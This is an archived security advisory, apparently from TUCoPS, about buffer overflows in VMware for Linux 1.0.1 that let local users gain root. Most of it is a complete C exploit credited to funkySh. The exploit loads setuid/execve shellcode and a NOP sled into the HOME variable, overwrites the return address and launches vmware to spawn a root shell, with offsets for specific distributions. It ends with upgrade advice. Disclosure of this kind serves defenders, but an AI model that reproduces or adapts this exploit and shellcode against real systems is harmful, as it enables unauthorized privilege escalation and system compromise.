Vulnerability
VMware
Affected
VMware for Linux 1.0.1 and previous
Description
The security hole allows a buffer overrun attack against VMware
for Linux to result in unprivileged root access to a machine.
VMware v1.0.1 is a software product by VMware, Inc. that creates a
virtual machine in which you can install multiple operating
systems without repartitioning or formatting your hard drive.
Team Asylum has found multiple buffer overflows existing in VMware
v1.0.1 for Linux. Earlier versions also have the same buffer
overflows. Any local user can exploit these overflows to gain
root access. funkySh posted following code that exploits
vulnerability:
/*
* VMware v1.0.1 root sploit
* funkySh 02/07/99
*
* 1. Redhat 5.2 2.2.9 offset 800-1100
* 2. offset 1600-2200
* 1. Slackware 3.6 2.2.9 offset 0
* 2. offset ?
*
* [ 1 - started from xterm on localhost ]
* [ 2 - started from telnet, with valid display ]
*/
#include <stdio.h>
char code[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define BUFFER 1032
#define NOP 0x90
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"
char buf[BUFFER];
void main(int argc, char * argv[])
{
int i, offset = 0;
if(argc > 1) offset = atoi(argv[1]);
memset(buf,NOP,BUFFER);
memcpy(buf+800,code,strlen(code));
for(i=854+2;i<BUFFER-2;i+=4)
*(int *)&buf[i]=RET_ADDR+offset;
setenv("HOME", buf, 1);
execl(PATH,"vmware","-display","127.0.0.1:0",0);
/* change IP if required */
}
Solution
All users are encouraged to upgrade to VMware v1.0.2. You may
download it directly off http://www.vmware.com.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
